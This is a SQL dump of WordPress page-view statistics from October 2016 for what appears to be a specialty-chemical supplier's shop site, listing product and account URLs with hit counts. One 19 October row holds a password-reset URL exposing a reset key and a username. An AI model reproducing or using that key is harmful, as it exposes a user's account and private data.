INSERT INTO `wp_statistics_pages` VALUES ('/product/triobosys-2200/', '2016-10-17', 1, 1100); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/triobosys-2200/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1100); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/', '2016-10-17', 1, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-830/', '2016-10-17', 1, 882); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-3522-w-60/', '2016-10-17', 1, 1031); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-3522-w-60/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1031); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids', '2016-10-17', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/', '2016-10-17', 1, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8021/', '2016-10-17', 1, 970); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-17', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-x-si/', '2016-10-17', 1, 2344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-x-si/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 2344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/', '2016-10-17', 1, 1069); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-61/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1069); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-17', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-17', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/', '2016-10-17', 1, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-1001f/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 924); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents', '2016-10-17', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-17', 1, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-18', 475, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-18', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-10-18', 2, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-18', 159, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-18', 89, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-18', 5, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-18', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-18', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-18', 22, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-18', 56, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/', '2016-10-18', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-18', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-18', 34, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-18', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-280282/', '2016-10-18', 1, 1713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-280282/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-18', 4, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-18', 4, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-18', 5, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-18', 6, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-10-18', 8, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-18', 17, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-18', 7, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-18', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-18', 40, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-18', 5, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-18', 36, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-18', 2, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/?wc-ajax=get_refreshed_fragments', '2016-10-18', 2, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-prepare-bearings/', '2016-10-18', 2, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-prepare-bearings/?wc-ajax=get_refreshed_fragments', '2016-10-18', 2, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-18', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-10-18', 3, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/?wc-ajax=get_refreshed_fragments', '2016-10-18', 3, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-18', 13, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-18', 5, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-18', 6, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-18', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-18', 5, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-18', 16, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-18', 5, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-10-18', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=1525', '2016-10-18', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720l/', '2016-10-18', 1, 1707); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-18', 5, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-18', 11, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-18', 14, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-18', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-18', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-18', 5, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/', '2016-10-18', 3, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506', '2016-10-18', 2, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-223/', '2016-10-18', 1, 844); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-223/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 844); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-18', 5, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-18', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('//checkout/', '2016-10-18', 1, 21); 
INSERT INTO `wp_statistics_pages` VALUES ('/checkout/', '2016-10-18', 1, 21); 
INSERT INTO `wp_statistics_pages` VALUES ('/cart/', '2016-10-18', 1, 20); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-18', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/%20', '2016-10-18', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-10-18', 5, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-18', 3, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-217/', '2016-10-18', 1, 824); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing', '2016-10-18', 3, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing/', '2016-10-18', 5, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-18', 1, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/', '2016-10-18', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-18', 2, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=1601', '2016-10-18', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-18', 2, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-18', 3, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-18', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/', '2016-10-18', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2245/', '2016-10-18', 1, 714); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-18', 8, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/', '2016-10-18', 1, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-10-18', 2, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/?wc-ajax=get_refreshed_fragments', '2016-10-18', 2, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8908/', '2016-10-18', 1, 881); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8908/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 881); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-10-18', 3, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-18', 1, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-18', 1, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-18', 4, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-760762/', '2016-10-18', 1, 1708); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-10-18', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-multi-use/', '2016-10-18', 1, 1801); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-silicone-lubricant/', '2016-10-18', 1, 1819); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-severe-service-grease/', '2016-10-18', 1, 1104); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-221x/', '2016-10-18', 1, 1647); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-223x/', '2016-10-18', 1, 1649); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/the/', '2016-10-18', 1, 1097); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/the/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1097); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bd/', '2016-10-18', 1, 675); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bd/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 675); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-10-18', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-18', 1, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-18', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-18', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-18', 2, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/110xn/', '2016-10-18', 1, 1662); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/', '2016-10-18', 2, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-538/', '2016-10-18', 1, 1836); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/', '2016-10-18', 1, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-18', 3, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/cobra-duster/', '2016-10-18', 2, 1851); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-conformal-coatings/', '2016-10-18', 2, 735); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-470s-12-oz-aerosol/', '2016-10-18', 2, 190); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/', '2016-10-18', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-18', 1, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-214x/', '2016-10-18', 1, 1643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-8900/', '2016-10-18', 1, 868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-214x/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tm7/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1077); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson', '2016-10-18', 5, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds', '2016-10-18', 2, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-18', 2, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-3522-w-60/', '2016-10-18', 1, 1031); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epi-rez-3522-w-60/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1031); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n', '2016-10-18', 2, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-18', 2, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating', '2016-10-18', 2, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-18', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122adl/', '2016-10-18', 1, 1679); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/', '2016-10-18', 3, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/?wc-ajax=get_refreshed_fragments', '2016-10-18', 2, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-10-18', 2, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-18', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3245/', '2016-10-18', 1, 1187); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3245/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1187); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-10-18', 1, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ks-1220/', '2016-10-18', 1, 2460); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-18', 2, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-18', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-18', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-18', 2, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-18', 2, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-18', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-18', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-10-18', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-19', 436, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-19', 30, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-19', 36, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-19', 51, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-19', 6, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3125/', '2016-10-19', 1, 1866); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-19', 14, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-19', 62, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-19', 28, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-19', 74, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-124h/', '2016-10-19', 1, 1673); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/?wc-ajax=get_refreshed_fragments', '2016-10-19', 2, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-19', 2, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-19', 143, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-19', 1, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/', '2016-10-19', 1, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/', '2016-10-19', 1, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-19', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-19', 21, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-19', 4, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-19', 3, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-19', 3, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-19', 2, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-specialty-solvent/', '2016-10-19', 1, 2618); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-specialty-solvent/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 2618); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-19', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-19', 10, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-19', 5, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-19', 9, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-19', 10, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-19', 23, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/?wc-ajax=get_refreshed_fragments', '2016-10-19', 11, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/?wc-ajax=get_refreshed_fragments', '2016-10-19', 11, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-19', 1, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-19', 2, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/', '2016-10-19', 2, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-19', 2, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson', '2016-10-19', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-19', 2, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-19', 1, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-19', 14, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-19', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-19', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-19', 12, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-19', 6, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-19', 9, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/', '2016-10-19', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/?reset-link-sent=true', '2016-10-19', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/?key=FUIvZ9WUE54uyVrOmGwv&amp;login=asmith', '2016-10-19', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-760762/', '2016-10-19', 2, 1708); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-760762/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 1708); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-19', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-19', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-107/', '2016-10-19', 1, 1227); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-107/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 1227); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-19', 4, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-19', 3, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/', '2016-10-19', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-19', 5, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-19', 4, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-19', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-101/', '2016-10-19', 1, 436); 
